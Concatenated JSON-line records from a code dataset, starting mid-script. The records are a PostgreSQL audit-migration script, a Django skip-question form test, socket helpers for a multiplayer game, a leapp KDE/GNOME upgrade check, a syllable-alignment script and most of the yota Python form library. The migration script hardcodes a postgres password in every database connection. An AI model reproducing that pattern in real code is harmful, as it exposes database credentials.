opsmxtime, json.dumps(audit_data), audit_data['eventId'], 'OES'\n cur.execute(\n \"INSERT INTO audit_events (created_at, updated_at, data, event_id, source) VALUES (%s, %s, %s, %s, %s)\",\n data)\n\n except Exception as e:\n print(\"Exception occurred while migrating policy audit : \", e)\n raise e\n\n\ndef fetch_policy_audit():\n try:\n cur = oesdb_conn.cursor()\n cur.execute(\n \"select action, application, description, execution_id, gate, pipeline, policy_event, policy_name, result, user_id,created_date from policy_audit\")\n return cur.fetchall()\n except Exception as e:\n print(\"Exception occurred while fetching policy audit : \", e)\n raise e\n\n\nif __name__ == '__main__':\n n = len(sys.argv)\n if n != 13:\n print(\n 'Please pass valid 11 arguments visibilitydb '\n ' (spinnaker gate url) (configured spinnaker active session Id)')\n\n visibility_db = 'visibilitydb'\n visibility_host = sys.argv[2]\n platform_db = sys.argv[3]\n platform_host = sys.argv[4]\n opsmx_db = sys.argv[5]\n opsmx_host = sys.argv[6]\n oes_db = sys.argv[7]\n oes_host = sys.argv[8]\n audit_db = sys.argv[9]\n audit_host = sys.argv[10]\n port = sys.argv[11]\n url = sys.argv[12]\n session_id = sys.argv[13]\n\n print(\"Using default host url ex:http://github.com\")\n\n # Establishing the visibility db connection\n visibility_conn = psycopg2.connect(database=visibility_db, user='postgres', password='networks123',\n host=visibility_host, port=port)\n print(\"Visibility database connection established successfully\")\n\n # Establishing the platform db connection\n platform_conn = psycopg2.connect(database=platform_db, user='postgres', password='networks123', host=platform_host,\n port=port)\n print('Opened platform database connection successfully')\n\n # Establishing the opsmx db connection\n opsmxdb_conn = psycopg2.connect(database=opsmx_db, user='postgres', password='networks123', host=opsmx_host,\n port=port)\n print(\"opsmx database connection established successfully\")\n\n # Establishing the opsmx db connection\n oesdb_conn = psycopg2.connect(database=oes_db, user='postgres', password='networks123',\n host=oes_host, port=port)\n print(\"oes(sapor) database connection established successfully\")\n\n # Establishing the audit db connection\n audit_conn = psycopg2.connect(database=audit_db, user='postgres', password='networks123',\n host=audit_host, port=port)\n print('audit database connection successfully')\n\n perform_migration()\n","sub_path":"scripts/oes-data-migration-scripts/migration_v3.9.x_to_v3.10.py","file_name":"migration_v3.9.x_to_v3.10.py","file_ext":"py","file_size_in_byte":23802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"290154899","text":"from questionnaire.forms.skip_question_form import SkipQuestionRuleForm\nfrom questionnaire.models import SkipQuestion, QuestionGroupOrder\nfrom questionnaire.tests.base_test import BaseTest\nfrom questionnaire.tests.factories.question_factory import QuestionFactory\nfrom questionnaire.tests.factories.question_group_factory import QuestionGroupFactory\nfrom questionnaire.tests.factories.question_option_factory import QuestionOptionFactory\nfrom questionnaire.tests.factories.sub_section_factory import SubSectionFactory\n\n\nclass SkipQuestionRuleFormTest(BaseTest):\n def setUp(self):\n self.root_question = QuestionFactory()\n self.question_to_skip = QuestionFactory()\n self.response = QuestionOptionFactory(question=self.root_question)\n self.subsection = SubSectionFactory()\n self.question_group = QuestionGroupFactory()\n\n self.root_question.question_group.add(self.question_group)\n self.question_to_skip.question_group.add(self.question_group)\n self.subsection.question_group.add(self.question_group)\n\n self.form_data = {'root_question': self.root_question.id,\n 'response': self.response.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n QuestionGroupOrder.objects.create(question=self.root_question, question_group=self.question_group, order=1)\n QuestionGroupOrder.objects.create(question=self.question_to_skip, question_group=self.question_group, order=2)\n\n\n def test_save(self):\n skip_question_form = SkipQuestionRuleForm(data=self.form_data)\n\n skip_question_form.save()\n skip_question_rules = SkipQuestion.objects.filter(**self.form_data)\n self.assertEqual(skip_question_rules.count(), 1)\n\n def test_invalid_if_skip_question_is_same_as_root_question(self):\n data = {'root_question': self.root_question.id,\n 'response': self.response.id,\n 'skip_question': self.root_question.id,\n 'subsection': self.subsection.id}\n\n skip_question_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_form.is_valid())\n\n def test_invalid_if_root_question_and_root_question_does_not_belong_to_subsection(self):\n root_question1 = QuestionFactory()\n question_another_group = QuestionGroupFactory()\n subsection = SubSectionFactory()\n\n root_question1.question_group.add(question_another_group)\n subsection.question_group.add(question_another_group)\n\n data = {'root_question': root_question1.id,\n 'response': self.response.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n skip_question_rule_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_rule_form.is_valid())\n\n def test_is_invalid_if_question_option_is_not_valid_option(self):\n invalid_option = QuestionOptionFactory()\n\n data = {'root_question': self.root_question.id,\n 'response': invalid_option.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n\n skip_question_rule_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_rule_form.is_valid())\n\n def test_is_invalid_if_root_question_order_is_greater_than_skip_question(self):\n root_question = QuestionFactory()\n self.question_group.question.add(root_question)\n\n QuestionGroupOrder.objects.create(question=root_question, question_group=self.question_group, order=3)\n\n data = {'root_question': root_question.id,\n 'response': self.response.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n\n skip_question_rule_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_rule_form.is_valid())","sub_path":"questionnaire/tests/forms/test_skip_question_form.py","file_name":"test_skip_question_form.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"120039309","text":"import json\nimport socket\n\nfrom Player import Player\nfrom game_logic import *\n\n\ndef make_move(table, player, messages_buffer: bytes):\n write_socket_from_dict(player.socket, {\"table\": table, \"token\": 1, \"msg\": \"Your turn!\"})\n\n messages_buffer, response = read_socket_to_dict(player.socket, messages_buffer)\n while not assign_field(table, player.sign, response[\"move\"]):\n write_socket_from_dict(player.socket, {\"table\": table, \"token\": 1, \"msg\": \"Illegal move!\"})\n messages_buffer, response = read_socket_to_dict(player.socket, messages_buffer)\n\n write_socket_from_dict(player.socket, {\"table\": table, \"token\": 0, \"msg\": \"Wait for the other player.\"})\n\n\ndef wait_for_players(server_socket: socket, players_count: int, messages_buffer: bytes) -> list:\n players_dict = dict()\n\n while len(players_dict) < players_count:\n sck, addr = server_socket.accept()\n messages_buffer, msg_dict = read_socket_to_dict(sck, messages_buffer)\n\n while msg_dict[\"nickname\"] in players_dict.keys():\n write_socket_from_dict(sck, {\"msg\": \"This nickname is already taken!\", \"token\": 1})\n messages_buffer, msg_dict = read_socket_to_dict(sck, messages_buffer)\n\n players_dict[msg_dict[\"nickname\"]] = Player(msg_dict[\"nickname\"], sck, \"-1\")\n write_socket_from_dict(sck, {\"msg\": \"Waiting for the other player.\", \"token\": 0})\n\n players_list = list(players_dict.values())\n write_socket_from_dict(players_list[0].socket,\n {\"msg\": f\"{players_list[1].nickname} will be your opponent!\", \"token\": 0})\n write_socket_from_dict(players_list[1].socket,\n {\"msg\": f\"{players_list[0].nickname} will be your opponent!\", \"token\": 0})\n\n return players_list\n\n\ndef read_socket_to_dict(sck: socket, buffer: bytes) -> [bytes, dict]:\n if buffer == b'':\n buffer = sck.recv(1024)\n\n end_of_json = buffer.find(b'}') + 1\n msg = buffer[0:end_of_json]\n buffer = buffer[end_of_json:]\n return buffer, dict(json.loads(msg))\n\n\ndef write_socket_from_dict(sck: socket, data: dict):\n sck.send(json.dumps(data).encode('utf-8'))\n","sub_path":"multiplayer_logic.py","file_name":"multiplayer_logic.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"503737178","text":"from leapp import reporting\nfrom leapp.libraries.stdlib import api\nfrom leapp.models import InstalledDesktopsFacts, InstalledKdeAppsFacts\n\n\ndef check_kde_gnome():\n desktopFacts = next(api.consume(InstalledDesktopsFacts))\n kde_desktop_installed = desktopFacts.kde_installed\n gnome_desktop_installed = desktopFacts.gnome_installed\n\n # No desktop installed, we don't even care about apps as they are most likely not used or even installed\n if not kde_desktop_installed and not gnome_desktop_installed:\n api.current_logger().info(\"No desktop installed. Continuing with the upgrade.\")\n return\n\n if kde_desktop_installed:\n api.current_logger().info(\"KDE desktop is installed. Checking what we can do about it.\")\n if not gnome_desktop_installed:\n api.current_logger().error(\"Cannot perform the upgrade because there is\"\n \" no other desktop than KDE installed.\")\n # We cannot continue with the upgrade process\n reporting.create_report([\n reporting.Title(\"Cannot upgrade because there is no other desktop than KDE installed.\"),\n reporting.Summary(\"The KDE desktop environment is not available on RHEL 8. \"\n \"The KDE-related packages will be uninstalled during the upgrade and because \"\n \"the only currently installed desktop environment is KDE, there will be no \"\n \"other desktop environment after upgrade.\"),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Tags([\n reporting.Tags.UPGRADE_PROCESS\n ]),\n reporting.Flags([\n reporting.Flags.INHIBITOR\n ]),\n reporting.Remediation(\n hint=\"Install GNOME desktop to be able to upgrade.\",\n commands=[['yum', '-y', 'groupinstall', '\"Server with GUI\"']])\n ])\n return\n\n # Assume both GNOME and KDE are installed in this state\n api.current_logger().info(\"Upgrade can be performed, but KDE desktop will\"\n \" be removed in favor of GNOME\")\n reporting.create_report([\n reporting.Title(\"Upgrade can be performed, but KDE will be uninstalled.\"),\n reporting.Summary(\"The KDE desktop environment is not available on RHEL 8. KDE will be uninstalled \"\n \"in favor of GNOME during the upgrade.\"),\n reporting.Severity(reporting.Severity.MEDIUM),\n reporting.Tags([\n reporting.Tags.UPGRADE_PROCESS\n ])])\n api.current_logger().info(\"----------------------------------\")\n\n # At this state we just need to detect whether any KDE/Qt app is installed to inform user\n # that the application will be removed during the upgrade process. No matter if KDE is installed\n # or not.\n\n KDEAppsFacts = next(api.consume(InstalledKdeAppsFacts))\n if KDEAppsFacts.installed_apps:\n # upgrade can be performed, but user will loose KDE apps\n api.current_logger().info(\"Installed KDE/Qt apps detected.\")\n reporting.create_report([\n reporting.Title(\"Upgrade can be performed, but KDE/Qt apps will be uninstalled.\"),\n reporting.Summary(\"The KDE desktop environment is not available on RHEL 8. \"\n \"All the KDE/Qt apps will be removed during the upgrade, including but not limited \"\n \"to:\\n- {0}\".format(\"\\n- \".join(KDEAppsFacts.installed_apps))),\n reporting.Severity(reporting.Severity.MEDIUM),\n reporting.Tags([\n reporting.Tags.UPGRADE_PROCESS\n ])])\n else:\n api.current_logger().info(\"No KDE app in use detected.\")\n # upgrade can be performed\n","sub_path":"repos/system_upgrade/el7toel8/actors/checkkdegnome/libraries/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59687846","text":"import os\nimport sys\nimport argparse\nimport util\nimport pyphen\nimport pickle\nimport dtw\nfrom psxDecoder import get_psxDecoder, get_audio_transcribe, get_whole_phoneme, cmuPhonemeDict\n\n_decoder = get_psxDecoder()\n_phone_dict = cmuPhonemeDict()\n\n\ndef load_mapDict():\n data_path = 'phDic.cfg'\n with open(data_path, \"rb\") as f:\n data = pickle.load(f)\n return data\n\n\ndef get_syllables(word):\n dic = pyphen.Pyphen(lang='en')\n res_array = dic.inserted(word)\n # print(res_array)\n return res_array\n\n\ndef find_element_in_list(ele, my_list):\n indices = [i for i, x in enumerate(my_list) if x == ele]\n return indices\n\n\ndef get_mapping_syllable(word):\n syllables = get_syllables(word)\n # all_phonemes = get_whole_phoneme(word)\n all_phonemes = _phone_dict.get_phonemes(word)\n print('syllable: {}'.format(syllables))\n\n cur_phoneme = all_phonemes[0]\n print('phoneme: {}'.format(cur_phoneme))\n\n phoneme_list = str(cur_phoneme).strip().split(' ')\n syllable_list = syllables.strip().split('-')\n if len(syllable_list) == 1:\n return [0], [phoneme_list], syllables\n # mapping\n mp_dict = load_mapDict()\n virt_phonemes = []\n for ch in word:\n virt_phonemes.append(mp_dict[ch][0])\n # print(virt_phonemes)\n dtw_path = dtw.get_DTW_path(phoneme_list, virt_phonemes)\n # print(dtw_path)\n\n res_indices = []\n word_length = len(word)\n prev_len = 0\n for i in range(len(syllable_list)):\n virt_ind = prev_len\n phoneme_ind = find_element_in_list(virt_ind, dtw_path[1])[0]\n syllable_ind = dtw_path[0][phoneme_ind]\n res_indices.append(syllable_ind)\n prev_len += len(syllable_list[i])\n res_phonemes = []\n for i, ind in enumerate(res_indices):\n if i == len(res_indices) - 1:\n res_phonemes.append([x for x in phoneme_list[ind:]])\n else:\n res_phonemes.append([x for x in phoneme_list[ind:res_indices[i+1]]])\n \"\"\"\n for syl in res_phonemes:\n print(' '.join([x for x in syl]), end=' - ')\n \"\"\"\n return res_indices, res_phonemes, syllables\n\n\ndef syllable_recognize(file_path, word):\n res_file = 'test_syllable_shan.txt'\n with open(res_file, 'at') as fp:\n fp.write('file name: {}\\n'.format(os.path.basename(file_path)))\n\n # \"\"\"\n align_result = util.get_mfa_aligning(file_path, word)\n syll_indices, syll_list, sylls = get_mapping_syllable(word)\n time_frames = []\n if len(align_result) > 0:\n fp.write('syllable: {}\\n'.format(sylls))\n for i, syll_ind in enumerate(syll_indices):\n if i < len(syll_indices) - 1:\n syl_rep = ' '.join([x for x in syll_list[i]])\n st_time = align_result[syll_ind][0]\n ed_time = align_result[syll_indices[i+1]-1][1]\n else:\n syl_rep = ' '.join([x for x in syll_list[-1]])\n st_time = align_result[syll_ind][0]\n ed_time = align_result[-1][1]\n time_frames.append([syl_rep, st_time, ed_time])\n fp.write('{}: [{}, {}]\\n'.format(syl_rep, st_time, ed_time))\n else:\n _, comp_align_result = get_audio_transcribe(_decoder, file_path)\n for seg in comp_align_result:\n align_result.append([seg[1], seg[2], seg[0]])\n\n fp.write('\\n')\n\n _, align_result2 = get_audio_transcribe(_decoder, file_path)\n print(align_result2)\n a = 0\n \"\"\"\n fp.write('phoneme aligning:\\n')\n for seg in align_result1:\n fp.write('\\t{}: [{:.2f}, {:.2f}]\\n'.format(seg[0], seg[1], seg[2]))\n fp.write('\\n')\n for seg in align_result2:\n fp.write('\\t{}: [{:.2f}, {:.2f}]\\n'.format(seg[0], seg[1], seg[2]))\n \n syllables = get_syllables(word)\n fp.write('syllable: {}\\n'.format(syllables))\n\n all_phonemes = get_whole_phoneme(word)\n for ind in range(len(all_phonemes)):\n fp.write('phoneme-{}: {}\\n'.format(ind + 1, ' '.join(x for x in all_phonemes[ind])))\n fp.write('\\n')\n # \"\"\"\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Running Aligner Inference\")\n parser.add_argument('--dir', default=None, help='Path to data directory which includes sample files')\n args = parser.parse_args()\n\n work_folder = args.dir\n if work_folder is not None:\n if not os.path.exists(work_folder):\n print(\"data path error!\")\n sys.exit(1)\n\n conv_folder = os.path.join(work_folder, 'conv_data')\n if not os.path.exists(conv_folder):\n os.mkdir(conv_folder)\n util.convert2wav_folder(work_folder, conv_folder)\n\n for f in os.listdir(conv_folder):\n print('\\nprocessing with {}'.format(f))\n file_path = os.path.join(conv_folder, f)\n # file name: speaker_word_revision\n word = f.split('-')[1].lower()\n syllable_recognize(file_path, word)\n # get_mapping_syllable(word)\n else:\n print(\"argument error\")\n sys.exit(1)\n","sub_path":"scoringAPI/scoring_engine/syllableRecognize.py","file_name":"syllableRecognize.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"358386720","text":"from yota.renderers import JinjaRenderer\nfrom yota.processors import FlaskPostProcessor\nfrom yota.nodes import LeaderNode, Node\nfrom yota.validators import Check, Listener\nimport json\nimport copy\n\n\nclass TrackingMeta(type):\n \"\"\" This metaclass builds our Form classes. It generates the internal\n _node_list which preserves order of Nodes in your Form as declared. It also\n generates _validation_list for explicitly declared Check attributes in the\n Form \"\"\"\n\n def __init__(mcs, name, bases, dct):\n \"\"\" Process all of the attributes in the `Form` (or subclass)\n declaration and place them accordingly. This builds the internal\n _node_list and _validation_list and is responsible for preserving\n initial Node order. \"\"\"\n\n nodes = {}\n mcs._validation_list = []\n mcs._node_list = []\n mcs._event_lists = {}\n for name, attribute in dct.items():\n # These aren't ordered Nodes, ignore them\n if name is 'start' or name is 'close':\n try:\n attribute._attr_name = name\n except AttributeError:\n raise AttributeError(\"start/close attribute is special and\"\n \"should specify a Node to begin your form. Got type {0}\"\n \"instead\".format(type(name)))\n continue\n if isinstance(attribute, Node):\n attribute._attr_name = name\n nodes[attribute._create_counter] = attribute\n delattr(mcs, name)\n elif isinstance(attribute, Check):\n # if we've found a validation check\n attribute._attr_name = name\n mcs._validation_list.append(attribute)\n delattr(mcs, name)\n elif isinstance(attribute, Listener):\n # if we've found a validation check\n attribute._attr_name = name\n if attribute.type not in mcs._event_lists:\n mcs._event_lists[attribute.type] = []\n mcs._event_lists[attribute.type].append(attribute)\n delattr(mcs, name)\n else:\n # just assume that this is some kind of blueprint with\n # ducktyping\n try:\n for node in attribute._node_list:\n nodes[node._create_counter] = node\n except AttributeError:\n pass\n\n # merge in our events\n try:\n for key, lst in attribute._event_lists.items():\n if key in mcs._event_lists:\n mcs._event_lists[key].extend(lst)\n else:\n mcs._event_lists[key] = lst\n except AttributeError:\n pass\n\n # and validation\n try:\n mcs._validation_list.extend(attribute._validation_list)\n except AttributeError:\n pass\n\n # insert our nodes in sorted order by there initialization order, thus\n # preserving order\n for i, attribute in sorted(nodes.items()):\n mcs._node_list.append(attribute)\n\n_Form = TrackingMeta('_Form', (object, ), {})\nclass Form(_Form):\n \"\"\" This is the base class that all user defined forms should inherit from,\n and as such it is the main way to access functionality in Yota. It\n provides the core functionality involved with setting up and\n rendering the form.\n\n :param context: This is a context specifically for the special form open\n and form close nodes, canonically called start and close.\n\n :param g_context: This is a global context that will be passed to all nodes\n in rendering thorugh their rendering context as 'g' variable.\n\n :param start_template: The template used when automatically\n injecting a start Node. See :attr:`yota.Form.auto_start_close` for\n more information.\n\n :param close_template: The template used when automatically\n injecting a close Node. See :attr:`yota.Form.auto_start_close` for\n more information.\n\n :param auto_start_close: Dictates whether or not start and close\n Nodes will be automatically appended/prepended to your form. Note\n that this must be set via __init__ or your class definition since it\n must be set before __init__ for the Form is run.\n\n :param hidden: A dictionary of hidden key/value pairs to be injected\n into the form. This is frequently used to pass dynamic form\n parameters into the validator.\n\n \"\"\"\n\n __metaclass__ = TrackingMeta\n _renderer = JinjaRenderer\n \"\"\" This is a class object that is used to perform the actual rendering\n steps, allowing different rendering engines to be swapped out. More about\n this in the section :class:`Renderer` \"\"\"\n _processor = FlaskPostProcessor\n \"\"\" This is a class that performs post processing on whatever is passed in\n as data during validation. The intended purpose of this was to write\n processors that translated submitted form data from the format of the web\n framework being used to a format that Yota expects. It also allows things\n like filtering stripping characters or encoding all data that enters a\n validator. \"\"\"\n _reserved_attr_names = ('context', 'hidden', 'g_context', 'start_template',\n 'close_template', 'auto_start_close', '_renderer',\n '_processor', 'name')\n name = None\n context = {}\n g_context = {}\n title = None\n auto_start_close = True\n start_template = 'form_open'\n close_template = 'form_close'\n render_success = False\n render_error = False\n type_class_map = {'error': 'alert alert-error',\n 'info': 'alert alert-info',\n 'success': 'alert alert-success',\n 'warn': 'alert alert-warn'}\n \"\"\" A mapping of error types to their respective class values. Used to\n render messages to the user from validation. Changing it to render messages\n differently could be performed as follows:\n\n .. code-block:: python\n\n class MyForm(yota.Form):\n first = EntryNode(title='First name', validators=Check(MinLengthValidator(5)))\n last = EntryNode(title='Last name', validators=MinLengthValidator(5)\n\n # Override the default type_class_map with our own\n type_class_map = {'error': 'alert alert-error my-special-class', # Add an additional class\n 'info': 'alert alert-info',\n 'success': 'alert alert-success',\n 'warn': 'alert alert-warn'}\n \"\"\"\n\n\n def __init__(self, **kwargs):\n # A bit of a hack to copy all our class attributes\n for class_attr in dir(self):\n if class_attr in kwargs:\n continue\n att = getattr(self, class_attr)\n # We want to copy all the nodes as well as the list, this is a\n # succinct way to do it\n if class_attr in ['_node_list', '_validation_list', '_event_lists']:\n setattr(self, class_attr, copy.deepcopy(att))\n # Private attributes are internal stuff..\n elif not class_attr.startswith('__'):\n # don't try to copy functions, it doesn't go well\n if not callable(att):\n setattr(self, class_attr, copy.copy(att))\n self.context[class_attr] = att\n\n # Set a default name for our Form\n if self.name is None:\n self.name = self.__class__.__name__\n\n # pass some attributes to start/close nodes\n self.context['name'] = self.name\n self.context['title'] = self.title\n\n # run our safety checks, set identifiers, and set local attributes\n for node in self._node_list:\n self._setup_node(node)\n\n # passes everything to our rendering context and updates params.\n self.context.update(kwargs)\n self.__dict__.update(kwargs)\n\n # Add our open and close form defaults\n if hasattr(self, 'start'):\n self._node_list.insert(0, self.start)\n else:\n if self.auto_start_close:\n self.insert(0, LeaderNode(template=self.start_template,\n _attr_name='start',\n **self.context))\n if hasattr(self, 'close'):\n self._node_list.append(self.close)\n else:\n if self.auto_start_close:\n self.insert(-1, LeaderNode(template=self.close_template,\n _attr_name='close',\n **self.context))\n\n # Add some useful global variables for templates\n default_globals = {'form_id': self.name}\n # Let our globals be overridden\n default_globals.update(self.g_context)\n self.g_context = default_globals\n\n # Initialize some general state variable\n self._last_valid = None\n self._last_raw_json = None\n\n def render(self):\n \"\"\" Runs the renderer to parse templates of nodes and generate the form\n HTML.\n\n :returns: A string containing the generated output.\n \"\"\"\n # process the errors before we render\n self._process_errors()\n\n return self._renderer().render(self._node_list, self.g_context)\n\n def add_listener(self, listener, type):\n \"\"\" Attaches a :class:`Listener` to an event type. These Listener will\n be executed when trigger event is called. \"\"\"\n if type not in self._event_lists:\n self._event_lists[type] = []\n self._event_lists[type].append(listener)\n\n def trigger_event(self, type):\n \"\"\" Runs all the associated :class:`Listener`'s for a specific event\n type. \"\"\"\n try:\n for event in self._event_lists[type]:\n event.resolve_attr_names(self)\n event()\n except KeyError:\n pass\n\n def _setup_node(self, node):\n \"\"\" An internal function performs some safety checks, sets attribute,\n and set_identifiers \"\"\"\n try:\n if type(node._attr_name) is not str:\n raise AttributeError\n except AttributeError as e:\n raise AttributeError('Dynamically inserted nodes must have a _attr_name'\n ' attribute as a string. Please add it. ')\n\n if hasattr(self, node._attr_name):\n raise AttributeError( 'Attribute name {0} overlaps with a Form '\n 'attribute. Please rename.'\n .format(node._attr_name))\n\n node.set_identifiers(self.name)\n setattr(self, node._attr_name, node)\n\n def _parse_shorthand_validator(self, node):\n \"\"\" Loops thorugh all the Nodes and checks for shorthand validators.\n After inserting their checks into the form obj they are removed from\n the node. This is because a validation may be called multiple times on\n a single form instance. \"\"\"\n if hasattr(node, 'validators') and node.validators:\n # Convert a single callable to an iterator for convenience\n if callable(node.validators):\n node.validators = (node.validators, )\n\n for validator in node.validators:\n # If they provided a check add it, otherwise make the check\n # for them\n if isinstance(validator, Check):\n # Just for extra flexibility, add the attr if they left it out\n if not validator.args and not validator.kwargs:\n validator.args.append(node._attr_name)\n self._validation_list.append(validator)\n else:\n # Assume only a single attr if not specified\n new_valid = Check(validator, node._attr_name)\n self._validation_list.append(new_valid)\n\n # remove the attribute so multiple calls doesn't break things\n delattr(node, 'validators')\n\n def _process_errors(self):\n for node in self._node_list:\n # process the node errors and inject special values\n for error in node.errors:\n # Try and retrieve the class values for the result type\n # and send along the required render value\n try:\n error['_type_class'] = self.type_class_map[error['type']]\n except KeyError:\n error['_type_class'] = self.type_class_map['error']\n\n def insert_validator(self, new_validators):\n \"\"\" Inserts a validator to the validator list.\n\n :param validator: The :class:`Check` to be inserted.\n :type validator: Check \"\"\"\n\n for validator in new_validators:\n # check to allow passing in just a check\n if not isinstance(validator, Check):\n raise TypeError('Can only insert type Check or derived classes')\n\n # append the validator to the list\n self._validation_list.append(validator)\n\n def insert(self, position, new_node_list):\n \"\"\" Inserts a :class:`Node` object or a list of objects at the\n specified position into the :attr:`Form._node_list` of the form.\n Index -1 is an alias for the end of the list. After insertion\n the :meth:`Node.set_identifiers` will be called to generate\n identification for the :class:`Node`. For this to function,\n :attr:`Form._attr_name` must be specified for the node prior to\n insertion. \"\"\"\n\n # check to allow passing in just a node\n if isinstance(new_node_list, Node):\n new_node_list = (new_node_list,)\n\n for i, new_node in enumerate(new_node_list):\n\n self._setup_node(new_node)\n\n if position == -1:\n self._node_list.append(new_node)\n else:\n self._node_list.insert(position + i, new_node)\n\n def insert_after(self, prev_attr_name, new_node_list):\n \"\"\" Runs through the internal node structure attempting to find\n a :class:`Node` object whos :attr:`Node._attr_name` is\n prev_attr_name and inserts the passed node after it. If\n `prev_attr_name` cannot be matched it will be inserted at the\n end. Internally calls :meth:`Form.insert` and has the same\n requirements of the :class:`Node`.\n\n :param prev_attr_name: The attribute name of the `Node` that you\n would like to insert after.\n :type prev_attr_name: string\n :param new_node_list: The :class:`Node` or list of Nodes to be\n inserted.\n :type new_node_list: Node or list of Nodes \"\"\"\n\n # check to allow passing in just a node\n if isinstance(new_node_list, Node):\n new_node_list = (new_node_list,)\n\n # Loop through our list of nodes to find where to insert\n for index, node in enumerate(self._node_list):\n # found!\n if node._attr_name == prev_attr_name:\n for i, new_node in enumerate(new_node_list):\n self._node_list.insert(index + i + 1, new_node)\n setattr(self, new_node._attr_name, new_node)\n new_node.set_identifiers(self.name)\n break\n else:\n # failover append if not found\n for new_node in new_node_list:\n self._node_list.append(new_node)\n\n def get_by_attr(self, name):\n \"\"\" Safe accessor for looking up a node by :attr:`Node._attr_name` \"\"\"\n try:\n attr = getattr(self, name)\n except AttributeError:\n pass\n else:\n if isinstance(attr, Node):\n return attr\n raise AttributeError('Form attribute {0} couldn\\'t be resolved to'\n ' a Node'.format(name))\n\n def success_header_generate(self):\n \"\"\" Please see the documentation for :meth:`Form.error_header_generate`\n as it covers this function as well as itself. \"\"\"\n pass\n\n def error_header_generate(self, errors, block):\n \"\"\" This function, along with success_header_generate allow you to give\n form wide information back to the user for both AJAJ validated forms\n and conventionally validated forms, although the mechanisms are\n slightly different. Both functions are run at the end of a successful\n or failed validation call in order to give more information for\n rendering.\n\n For passing information to AJAJ rendering, simply return a dictionary,\n or any Python object that can be serialized to JSON. This information\n gets passed back to the JavaScript callbacks of yota_activate, however\n each in slightly different ways. success_header_generate's information\n will get passed to the render_success callback, while\n error_header_generate will get sent as an error to the render_error\n callback under the context start.\n\n For passing information into a regular, non AJAJ context simply access\n the attribute manually similar to below.\n\n .. code-block:: python\n\n self.start.add_error(\n {'message': 'Please resolve the errors below to continue.'})\n\n This will provide a simple error message to your start Node. In\n practice these functions could also be used to trigger events and other\n interesting things, although that was not their intended function.\n\n :param errors: This will be a list of all other Nodes that have errors.\n :param block: Whether or not the form submission will be blocked.\n :type block: boolean\n\n .. note: By default this function does nothing.\n \"\"\"\n pass\n\n def data_by_attr(self):\n \"\"\" Returns a dictionary of currently stored :attr:`Node.data`\n attributes keyed by :attr:`Node._attr_name`. Used for returning data\n after its been processed by validators. \"\"\"\n\n ret = {}\n for node in self._node_list:\n ret[node._attr_name] = node.data\n return ret\n\n def data_by_name(self):\n \"\"\" Returns a dictionary of currently stored :attr:`Node.data`\n attributes keyed by :attr:`Node.name`. Used for returning data\n after its been processed by validators. \"\"\"\n\n ret = {}\n for node in self._node_list:\n ret[node.name] = node.data\n return ret\n\n def _gen_validate(self, data, piecewise=False):\n \"\"\" This is an internal utility function that does the grunt work of\n running validation logic for a :class:`Form`. It is called by the other\n primary validation methods. \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n\n\n # reset all error lists and data\n for node in self._node_list:\n node.errors = []\n node.data = ''\n node.resolve_data(data)\n # Pull out all our shorthand validators\n self._parse_shorthand_validator(node)\n\n # try to load our visited list of it's piecewise validation\n if '_visited_names' not in data and piecewise:\n raise AttributeError(\"No _visited_names present in data submission\"\n \". Data is required for piecewise validation\")\n elif piecewise:\n visited = json.loads(data['_visited_names'])\n\n # assume to be not blocking\n block = False\n # loop over our checks and run our validators\n for check in self._validation_list:\n check.resolve_attr_names(self)\n if piecewise is False or check.node_visited(visited):\n check()\n else:\n # If even a single check can't be run, we need to block\n block = True\n\n # Run the one off validation method\n self.validator()\n\n # a list to hold Nodes that actually have errors\n error_node_list = []\n for node in self._node_list:\n # slightly confusing way of setting our block = True by\n # default\n if node.errors:\n\n error_node_list.append(node)\n\n for error in node.errors:\n block |= error.get('block', True)\n\n return block, error_node_list\n\n def json_validate(self, data, piecewise=False, raw=False):\n \"\"\" The same as :meth:`Form.validate_render` except the errors\n are loaded into a JSON string to be passed back as a query\n result. This output is designed to be used by the Yota\n Javascript library.\n\n :param piecewise: If set to True, the validator will silently\n ignore validator for which it has insufficient information. This\n is designed to be used for the AJAJ piecewise validation\n function, although it does not have to be.\n :type piecewise: boolean\n\n :param raw: If set to True then the second return parameter will be a\n Python dictionary instead of a JSON string\n :type raw: boolean\n\n :return: A boolean whether or not the form submission is valid and the\n json string (or raw dictionary) to pass back to the javascript side.\n The boolean is an anding of submission (whether the submit button was\n actually pressed) and the block parameter (whether or not any blocking\n validators passed)\n \"\"\"\n\n # Allows user to set a modular processor on incoming data\n data = self._processor().filter_post(data)\n\n errors = {}\n \"\"\" We want to automatically block the form from actually submitting\n if this is piecewise validation. In addition if they are actually\n submitting then we want to run it as non-piecewise validation \"\"\"\n if data.get('submit_action', 'false') != 'true' and piecewise:\n block, invalid = self._gen_validate(data, piecewise=piecewise)\n block = True\n else:\n block, invalid = self._gen_validate(data, piecewise=False)\n\n # loop over our nodes and insert information for the JS callbacks\n for node in invalid:\n errors[node._attr_name] = {'identifiers': node.json_identifiers(),\n 'errors': node.errors}\n\n # if needed we should run our all form message generator and return\n # json encoded error message\n retval = {'block': block}\n if len(errors) > 0:\n header_err = self.error_header_generate(errors, block)\n if header_err:\n errors['start'] = {'identifiers': 